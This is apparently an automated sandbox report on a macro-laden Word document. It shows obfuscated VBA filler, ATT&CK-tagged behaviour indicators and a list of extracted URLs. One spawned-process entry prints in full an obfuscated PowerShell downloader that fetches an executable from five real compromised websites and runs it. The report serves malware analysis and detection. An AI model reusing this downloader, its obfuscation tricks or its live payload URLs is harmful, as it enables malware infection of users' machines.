'Ramp Causeway mesh Camp backing up Illinois Ridge infrastructure Rustic Kroon interface withdrawal
calculatingrtz = Azerbaijanian_Manatsjt + Len("446") 'Rubber paradigm Plaza mobile deposit COM blue Walks
'reinvent Grocery, Movies & Automotive US Dollar Extensions Bahrain Specialist Ameliorated Unbranded compress
Buckinghamshireqdj = Azerbaijanian_Manatsjt + CStr(paymentwzr) 'pixel ivory Intranet solution-oriented Cedi Designer bus Guyana Factors Handcrafted Rubber Pizza Administrator hard drive Bond Markets Units European Composite Unit (EURCO) payment
'Wooden calculating payment mobile Berkshire Dong Wooden
Wend
'silver strategic program Rustic bypassing invoice Auto Loan Account Outdoors & Garden Rustic Wooden Bacon Lek Unbranded Rubber Chips
'/Producerkmc
'Passage Producer transmitter Robust sky blue Soft Cambridgeshire process improvement Licensed Frozen Chair Executive Highway US Dollar Computers & Garden
Azerbaijanian_Manatsjt = "Facilitator attitude-oriented Pound Sterling Unbranded Soft Idaho"
'/Personal_Loan_Accountnvw
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'grey Innovative deposit United States of America Identity Infrastructure Industrial & Baby Handmade Soft Pizza Thailand Indiana Guinea-Bissau algorithm deposit
Productszu = Azerbaijanian_Manatsjt + CInt(161) 'Costa Rican Colon Rue Future Incredible standardization copying benchmark
'International Fantastic global copying Developer card mobile
Steeliaa = Azerbaijanian_Manatsjt + Len("821") 'SQL XML real-time invoice Gorgeous Spring
'Pennsylvania View Officer Cambridgeshire extend upward-trending compress frictionless ivory Grocery & Music Ways Coordinator Generic Frozen Keyboard Auto Loan Account
programdrf = Azerbaijanian_Manatsjt + CInt(528) 'Optimization SDD Senior firewall optical Circles Tasty Soft Chair Hollow Hills Streamlined magnetic
'web-enabled Web Unbranded Frozen Bike Practical Frozen Bike incentivize infrastructures Jewelery & Beauty Guinea Program Checking Account Generic Granite Gloves Corners Practical Soft Table Wooden
Chiefmls = Azerbaijanian_Manatsjt + Len("391") 'cultivate National Investor Applications deposit Central out-of-the-box Refined Frozen Sausages Tokelau Liaison Iceland Krona Dong programming
'Unbranded Yemen Games, Sports & Kids Practical Plastic Computer Plastic Developer Tasty Fresh Car installation
digitalzwn = Azerbaijanian_Manatsjt + Len("303") 'solid state Cross-group teal Nigeria Handmade Steel Shirt feed
'Central e-markets teal generate indigo synthesizing feed invoice Jewelery, Grocery & Clothing Licensed solid state deposit Holy See (Vatican City State) Bypass
inputflf = Azerbaijanian_Manatsjt + CStr(greyajv) 'calculate pricing structure Park Synergistic Soft optimal ROI supply-chains parsing
'Handmade Concrete Soap utilisation quantifying Credit Card Account Colorado bandwidth-monitored Skyway Intelligent experiences Incredible Soft Chips payment
Wend
'action-items deliver Canada impactful gold back-end virtual
End Sub"
File "Humanaoo.bas" (Streampath: "Macros/VBA/Humanaoo") has code: "" - source
- Static Parser
- relevance
- 10/10
-
Contains embedded VBA macros (normalized)
- details
-
Normalized macro string: "http"
Normalized macro string: "HTTP" - source
- File/Memory
- relevance
- 10/10
- ATT&CK ID
- T1137 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DF6CF2E1016DFBD351.TMP"
"WINWORD.EXE" created file "%TEMP%\Word8.0\MSForms.exd" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Local\ZonesLockedCacheCounterMutex"
"Local\x64_10MU_ACBPIDS_S-1-5-5-0-62922"
"Local\ZonesCacheCounterMutex"
"Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
"Local\x64_10MU_ACB10_S-1-5-5-0-62922"
"\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACBPIDS_S-1-5-5-0-62922"
"\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACB10_S-1-5-5-0-62922"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~__583658295301_1004.doc" as clean (type is "data")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE14\RICHED20.DLL" at F4960000
- source
- Loaded Module
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at E13F0000
- source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "powershell.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, Path, PROCESSOR_ARCHITECTURE, ProgramFiles"
Process "powershell.exe" (Show Process) was launched with missing environment variables: "MEOW, PROCESSOR_ARCHITEW6432, PROMPT, VXDIR"
Process "897.exe" (Show Process) was launched with modified environment variables: "PSModulePath"
Process "897.exe" (Show Process) was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
Process "897.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"
Process "capprep.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, LOCALAPPDATA, USERDOMAIN, PROCESSOR_ARCHITECTURE, PSModulePath, TEMP, APPDATA, USERPROFILE, TMP, ProgramFiles"
Process "capprep.exe" (Show Process) was launched with missing environment variables: "PROCESSOR_ARCHITEW6432, LOGONSERVER, HOMEPATH, HOMEDRIVE"
Process "capprep.exe" (Show Process) was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
Process "capprep.exe" (Show Process) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles" - source
- Monitored Target
- relevance
- 10/10
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "T+4")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "H-4")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "J*4")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim"
"WINWORD.EXE" searching for class "Shell_TrayWnd" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1010 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns new processes
- details
- Spawned process "powershell.exe" with commandline "powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGM ..." (UID: 00025715-00002684, Additional Context: "<# https://www.microsoft.com/ #> $motivatingquq='Intelligentbqv';$modelsvhz = '897';$Assistantopz='Handcraftedcrd';$solid_statezch=$env:userprofile+'\'+$modelsvhz+'.exe';$plumkqj='US_Dollarjsz';$greenjwa=.('n'+'ew'+'-ob'+'ject') neT.webCLienT;$Rustic_Cotton_Fishsvl='http://www.eteensblog.com/2tgmnk/fJZIPCYV/@http://www.palisek.cz/wp-includes/YtgJbWQNtJ/@http://www.mnminfrasolutions.com/wp-admin/zeteXeJYC/@http://abbasargon.com/wp-admin/sqhztj4_dzq3e-019802155/@https://weiqing7.com/ex6/3r2js_ocgr3bew87-538460/'."s`PLiT"('@');$Graphical_User_Interfacezvu='Advancedinf';foreach($US_Dollarrbr in $Rustic_Cotton_Fishsvl){try{$greenjwa."D`owN`LOAdfiLE"($US_Dollarrbr, $solid_statezch);$wirelessfud='worldclassnkp';If ((.('G'+'et-'+'Item') $solid_statezch)."Le`NgTh" -ge 27543) {[Diagnostics.Process]::"s`TArt"($solid_statezch);$arrayvhc='maroonhat';break;$Azerbaijanwjk='calculateufw'}}catch{}}$Guyanalsw='Locksmvo'"), Spawned process "897.exe" (Show Process), Spawned process "897.exe" with commandline "--caaf215f" (Show Process), Spawned process "capprep.exe" (Show Process), Spawned process "capprep.exe" with commandline "--83c0e935" (Show Process)
- source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Contains ability to lookup the windows account name
- details
- GetUserNameA@ADVAPI32.dll (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Dropped files
- details
-
"~__583658295301_1004.doc" has type "data"
"897.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"RE_583658295301_1004.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Fri Oct 4 20:52:48 2019 mtime=Fri Oct 4 20:52:48 2019 atime=Fri Oct 4 20:52:56 2019 length=190976 window=hide"
"8785896.wmf" has type "ms-windows metafont .wmf"
"index.dat" has type "data"
"4F9A5442.wmf" has type "ms-windows metafont .wmf"
"C2DA935B.wmf" has type "ms-windows metafont .wmf"
"386260D7.wmf" has type "ms-windows metafont .wmf"
"3B6F62A9.wmf" has type "ms-windows metafont .wmf"
"849394EC.wmf" has type "ms-windows metafont .wmf"
"B231C914.wmf" has type "ms-windows metafont .wmf"
"85992E05.wmf" has type "ms-windows metafont .wmf"
"~WRS_1A55B392-6FBE-4E4D-8194-2A5527168528_.tmp" has type "data"
"443E14AE.wmf" has type "ms-windows metafont .wmf"
"80E439F.wmf" has type "ms-windows metafont .wmf"
"98416121.wmf" has type "ms-windows metafont .wmf"
"N8JKJMHQ1SGAVY4IHO3E.temp" has type "data"
"5FB2BDA0.wmf" has type "ms-windows metafont .wmf"
"MSForms.exd" has type "data"
"~_Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Drops executable files
- details
- "897.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Found a string that may be used as part of an injection method
- details
- "Shell_TrayWnd" (Taskbar window class may be used to inject into explorer with the SetWindowLong method)
- source
- File/Memory
- relevance
- 4/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001d.db"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A55B392-6FBE-4E4D-8194-2A5527168528}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B1069311-A861-4BFD-9969-2C8C5C826436}.tmp"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{061576E4-2B1D-49B2-BE1F-453A66FB6A6A}.tmp"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{061576E4-2B1D-49B2-BE1F-453A66FB6A6A}.tmp" - source
- API Call
- relevance
- 7/10
-
Contains ability to lookup the windows account name
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "https://www.microsoft.com/"
Pattern match: "www.eteensblog.com"
Pattern match: "l.ri/Smalllalivory"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://ogp.me/ns/fb#"
Pattern match: "http://gmpg.org/xfn/11/"
Pattern match: "http://www.eteensblog.com/xmlrpc.php/"
Pattern match: "http://www.eteensblog.com/feed/"
Pattern match: "http://www.eteensblog.com/comments/feed/"
Pattern match: "www.eteensblog.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/assets/css/style.min.css?ver=1.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/assets/css/shoppable-images-front.min.css?ver=1.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/mashsharer/assets/css/mashsb.min.css?ver=3.6.8"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/css/youtube.min.css?ver=1.3.3"
Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1"
Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/video-playlist/css/video-playlist.min.css?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/gallery/css/gallery.min.css?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.magnific-popup/magnific-popup.css?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/css/snax.min.css?ver=1.43"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/css/snax-frontend-submission.min.css?ver=1.43"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.tagit/css/jquery.tagit.css?ver=2.0"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.tagit/css/tagit.ui-zendesk.css?ver=2.0"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/froala_editor.min.css?ver=2.3.4"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/froala_style.min.css?ver=2.3.4"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/plugins/quick_insert.min.css?ver=2.3.4"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/plugins/char_counter.min.css?ver=2.3.4"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/froala/css/plugins/line_breaker.min.css?ver=2.3.4"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=6.0.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/whats-your-reaction/css/main.min.css?ver=1.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/wordpress-popular-posts/public/css/wpp.css?ver=4.2.2"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/original/all-light.min.css?ver=7.3.2"
Pattern match: "fonts.googleapis.com/css?family=Roboto%3A400%2C300%2C500%2C600%2C700%2C900%7CPoppins%3A400%2C300%2C500%2C600%2C700&subset=latin%2Clatin-ext&ver=7.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/uploads/dynamic-style-1567123380.css"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?ver=6.0.3"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/original/snax-extra-light.min.css?ver=7.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/original/vc-light.min.css?ver=7.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/original/mashshare-light.min.css?ver=7.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/wp-gdpr-compliance/assets/css/front.css?ver=1567040647"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/assets/js/slideup.js?ver=1.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/includes/shoppable-images/assets/js/shoppable-images-front.js?ver=1.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/ad-ace/assets/js/coupons.js?ver=1.3.2"
Pattern match: "www.eteensblog.com\/sweet-18yr-old-rion-makes-her-debut\/,title:Sweet+18yr+Old+Rion+Makes+Her+Debut,image:http:\/\/www.eteensblog.com\/wp-content\/uploads\/2019\/08\/rion00001.jpg,desc:This"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/mashsharer/assets/js/mashsb.min.js?ver=3.6.8"
Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1"
Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-includes/js/plupload/moxie.min.js?ver=1.3.5"
Pattern match: "http://www.eteensblog.com/wp-includes/js/plupload/plupload.min.js?ver=2.1.9"
Pattern match: "www.eteensblog.com\/wp-json\/wordpress-popular-posts\/v1\/popular-posts\/,ID:,token:1123317ede,debug"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/wordpress-popular-posts/public/js/wpp-4.2.0.min.js?ver=4.2.2"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/modernizr/modernizr-custom.min.js?ver=3.3.0"
Pattern match: "https://api.w.org/"
Pattern match: "http://www.eteensblog.com/xmlrpc.php?rsd"
Pattern match: "http://www.eteensblog.com/wp-includes/wlwmanifest.xml"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.eot"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.eot?#iefix"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.woff"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.ttf"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.svg#bimber"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/styles/mode-dark.min.css"
Pattern match: "http://schema.org/WebPage"
Pattern match: "http://www.eteensblog.com/"
Pattern match: "http://www.eteensblog.com"
Pattern match: "https://www.facebook.com/YOUR_USERNAME/"
Pattern match: "https://twitter.com/YOUR_USERNAME"
Pattern match: "http://www.eteensblog.com/?s="
Pattern match: "http://www.eteensblog.com/the-last-word-information-that-will-free-essay/"
Pattern match: "http://www.eteensblog.com/die-gefahr-die-anwendung-schreiben-eine-2/"
Pattern match: "http://www.eteensblog.com/ghost-writing-kein-geheimnis-mehr-2/"
Pattern match: "http://www.eteensblog.com/die-durchgesickerten-geheimnisse-der-wissenschaftlichen-hausarbeit-aufgedeckt-2/"
Pattern match: "http://www.eteensblog.com/the-leaked-secret-to-best-online-essay-writers-discovered-2/"
Pattern match: "http://www.eteensblog.com/short-article-reveals-the-undeniable-facts-about-best-essay-writer-and-how-it-can-affect-you-2/"
Pattern match: "http://www.eteensblog.com/category/teen-videos/"
Pattern match: "http://www.eteensblog.com/the-one-thing-to-do-for-what-is-a-term-math-2/"
Pattern match: "http://www.eteensblog.com/sweet-18yr-old-rion-makes-her-debut/"
Pattern match: "http://www.eteensblog.com/author/robet/"
Pattern match: "http://0.gravatar.com/avatar/f3473c0c2d4d166102cde6542292aa62?s=30&d=mm&r=g"
Pattern match: "https://wordpress.org/plugins/mailchimp-for-wp/"
Pattern match: "http://www.eteensblog.com/hearsay-deception-and-examples-of-essay-about-myself-3/"
Pattern match: "http://www.eteensblog.com/author/"
Pattern match: "http://1.gravatar.com/avatar/?s=30&d=mm&r=g"
Pattern match: "http://www.eteensblog.com/the-good-the-bad-and-language-translation-4/"
Pattern match: "http://2.gravatar.com/avatar/?s=30&d=mm&r=g"
Pattern match: "http://www.eteensblog.com/top-choices-of-structural-formula-chemistry-4/"
Pattern match: "http://0.gravatar.com/avatar/?s=30&d=mm&r=g"
Pattern match: "http://www.eteensblog.com/the-secret-to-entropy-chemistry-3/"
Pattern match: "http://www.eteensblog.com/the-ultimate-brain-chemistry-trick-4/"
Pattern match: "http://www.eteensblog.com/short-article-reveals-the-undeniable-facts-about-physics-project-and-how-it-can-affect-you-4/"
Pattern match: "http://www.eteensblog.com/what-to-expect-from-biology-conjugation-4/"
Pattern match: "http://www.eteensblog.com/lyse-biology-help-4/"
Pattern match: "http://www.eteensblog.com/page/2/"
Pattern match: "http://www.eteensblog.com/2019/10/"
Pattern match: "http://www.eteensblog.com/2019/08/"
Pattern match: "http://www.eteensblog.com/2015/11/"
Pattern match: "http://www.eteensblog.com/2015/10/"
Pattern match: "http://www.eteensblog.com/2015/09/"
Pattern match: "http://www.eteensblog.com/2015/08/"
Pattern match: "http://www.eteensblog.com/2015/07/"
Pattern match: "http://www.eteensblog.com/2015/06/"
Pattern match: "http://www.eteensblog.com/2015/05/"
Pattern match: "http://www.eteensblog.com/2015/04/"
Pattern match: "http://www.eteensblog.com/2015/03/"
Pattern match: "http://www.eteensblog.com/2015/02/"
Pattern match: "http://www.eteensblog.com/2015/01/"
Pattern match: "http://www.eteensblog.com/2014/12/"
Pattern match: "http://www.eteensblog.com/2014/11/"
Pattern match: "http://www.eteensblog.com/2014/10/"
Pattern match: "http://www.eteensblog.com/2014/09/"
Pattern match: "http://www.eteensblog.com/2014/08/"
Pattern match: "http://www.eteensblog.com/2014/07/"
Pattern match: "http://www.eteensblog.com/2014/06/"
Pattern match: "http://www.eteensblog.com/category/uncategorized/"
Pattern match: "http://www.eteensblog.com/?snax_login_popup"
Pattern match: "https://wordpress.org/"
Pattern match: "http://www.eteensblog.com/wp-login.php"
Pattern match: "http://www.eteensblog.com/?snax_login_popup=forgot_password"
Pattern match: "http://www.eteensblog.com/wp-login.php?action=lostpassword"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/g1-socials/css/screen-basic.min.css?ver=1.2.10"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/g1-socials/css/snapcode.min.css?ver=1.2.10"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/js/lazysizes/lazysizes.min.js?ver=4.0"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/js/youtube.js?ver=1.3.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/video-playlist/js/mejs-renderers/vimeo.min.js?ver=1.3.3"
Pattern match: "http://www.eteensblog.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/video-playlist/js/playlist.js?ver=1.3.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/media-ace/includes/gallery/js/gallery.js?ver=1.3.3"
Pattern match: "www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\,\home_url\:\http:\\\/\\\/www.eteensblog.com\,\user_id\:0,\post_id\:0,\nonce\:\7500a30bd0\,\history\:\off\,\i18n\:{\are_you_sure_remove\:\Entire"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/collections.min.js?ver=1.43"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.magnific-popup/jquery.magnific-popup.min.js?ver=1.1.0"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.timeago/jquery.timeago.js?ver=1.5.2"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/jquery.timeago/locales/jquery.timeago.en.js"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/plupload/handlers.js?ver=1.43"
Pattern match: "www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\,\site_url\:\http:\\\/\\\/www.eteensblog.com\,\autosave_interval\:60,\use_login_recaptcha\:false,\recaptcha_api_url\:\https:\\\/\\\/www.google.com\\\/recaptcha\\\/api.js\,\recaptcha_version\:\"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/front.js?ver=1.43"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/snax/assets/js/featured-image.js?ver=1.43"
Pattern match: "www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\,\error_msg\:\Some"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/whats-your-reaction/js/front.js?ver=1.3.2"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/flickity/flickity.pkgd.min.js?ver=2.0.9"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/stickyfill/stickyfill.min.js?ver=2.0.3"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/jquery.placeholder/placeholders.jquery.min.js?ver=4.0.1"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/matchmedia/matchmedia.js"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/matchmedia/matchmedia.addlistener.js"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/picturefill/picturefill.min.js?ver=2.3.1"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/jquery.waypoints/jquery.waypoints.min.js?ver=4.0.0"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/libgif/libgif.js"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/enquire/enquire.min.js?ver=2.1.2"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.11.4"
Pattern match: "http://www.eteensblog.com/wp-includes/js/wp-sanitize.min.js?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-includes/js/wp-a11y.min.js?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.11.4"
Pattern match: "www.eteensblog.com\\\/wp-admin\\\/admin-ajax.php\,\timeago\:\on\,\sharebar\:\on\,\microshare\:\on\,\i18n\:{\menu\:{\go_to\:\Go"
Pattern match: "http://www.eteensblog.com/wp-content/themes/bimber/js/front.js?ver=7.3.2"
Pattern match: "www.eteensblog.com\/wp-admin\/admin-ajax.php,ajaxSecurity:fc820b0b2a,isMultisite:,path:\/,blogId"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/wp-gdpr-compliance/assets/js/front.js?ver=1567040647"
Pattern match: "http://www.eteensblog.com/wp-includes/js/wp-embed.min.js?ver=5.2.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js?ver=4.5.3"
Pattern match: "http://www.eteensblog.com/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=4.5.3" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
-
"<link rel='stylesheet' id='mace-lazy-load-youtube-css' href='http://www.eteensblog.com/wp-content/plugins/media-ace/includes/lazy-load/css/youtube.min.css?ver=1.3.3' type='text/css' media='all' />" (Indicator: "youtube")
